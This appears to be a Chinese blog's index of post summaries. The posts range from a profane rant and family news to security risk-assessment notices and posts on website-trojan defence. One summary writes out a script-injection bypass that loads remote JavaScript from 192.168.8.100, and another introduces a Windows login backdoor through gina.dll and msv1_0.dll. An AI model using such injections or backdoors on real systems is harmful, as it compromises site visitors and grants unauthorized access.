摘要： 我草!!!,MD老子心情不好!!!MD什么玩意!!!MD爱如何如何!!!!我草!!!,MD老子心情不好!!!MD什么玩意!!!MD爱如何如何!!!!我草!!!,MD老子心情不好!!!MD什么玩意!!!MD爱如何如何!!!!我草!!!,MD老子心情不好!!!MD什么玩意!!!MD爱如何如何!!!!我草!!!,MD老子心情不好!!!MD什么玩意!!!MD爱如何如何!!!!我草!!!,MD老子心情不好!... 阅读全文

摘要： 迎接新生命!!! 4月咯。宝宝马上面世咯....要当爸爸了,还真是说不上几分感觉!兴奋?担忧?也许还带着更多的特殊感情!!!当然,也要向辛苦的老婆致敬...好好保养哦..期待ing!!! 阅读全文

摘要： 一、 前言 　　风险评估的极端重要性已经越来越被用户认同。在2000－2001年，大多数用户的安全评估需求主要集中于系统脆弱性评估和渗透性测试；在2001－2002年，多数用户的安全评估需求已经侧重于整个管理体系的评估和对特定应用系统的评估；从2002年开始，许多行业用户对全面风险评估提出了要求。 　　二、 标准与理论 　　我们在风险评估实践中，主要参考了BS 7799（ISO/IEC 17799... 阅读全文

摘要： 关于加强国家电子政务工程建设项目信息安全风险评估工作的通知中央和国家机关各部委，国务院各直属机构、办事机构、事业单位，各省、自治区、直辖市及计划单列市、新疆生产建设兵团发展改革委、公安厅、保密局：　　为了贯彻落实《国家信息化领导小组关于加强信息安全保障工作的意见》（中办发[2003]27号），加强基础信息网络和重要信息系统安全保障，按照《国家电子政务工程建设项目管理暂行办法》（国家发展和改革委员会... 阅读全文

摘要： 来源：看雪学院作者：clyfishwindows有通用密码吗？去问比尔大叔吧。先不管是不是真的有，我们可以自己实现一个这样的后门。先简单介绍一下windows登陆过程中的一些过程。winlogon进程用gina.dll获取用户名和密码，通过LPC传给lsass进程。然后lsass进程调用默认认证包msv1_0.dll来验证密码的对错。而msv1_0则从SAM中获得用户的信息，包括密码的哈希。要实现... 阅读全文

摘要： 5.3日，我生日。。。出奇的淡寞。仿佛不曾有过任何意义的一天。 老婆的陪伴让我感受到幸福，这是一种平淡的过程中最适合的情调。没有太多的感慨，惟有深深的提切。 生日的一天中，晚上那顿强塞进肚子的方便面让我无限畅想。有只好猫的感觉真是幸福又无奈啊。。。 阅读全文

摘要： 或许我不该去看那个报道，每次总是想刺激一下自己，可一不小心就把自己弄得很伤我知道我跟他们之间没有可比性，起点不一样，工作岗位不一样，研发和销售的待遇自然更不一样。其实这些都不是我应该看重的，可是当别人一季度比我一年拿的钱都多的时候，心里还是会一震震的...可是让我难过得地方是别人可以拼命的工作，甚至于疯狂的投入，我却能因为困而上班迟到，这种无形的惰性是我最不期望看到了，使因为平时工作太顺利？太安逸... 阅读全文

摘要： 主要目的是用css解决script标签里的http，这种方法治标不治本，我觉得防掉很难的，根治办法就是主机安全，不给别人黑掉的机会突破方法有N种，最简单的突破办法，不把src=http放在<script>标签里。代码：<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/... 阅读全文

摘要： 还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来帮帮大家。　　前不久《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂<script>木马，汗了，看了几个网友的网站都被这样了—... 阅读全文

摘要： on error resume nextDim keyWord, DirTotal, TimeSpend, FileTotal, Fso, outFile, txtResult, txtPath, sPathConst MY_COMPUTER = &H11&Const WINDOW_HANDLE = 0Const OPTIONS = 0Set objShell = CreateOb... 阅读全文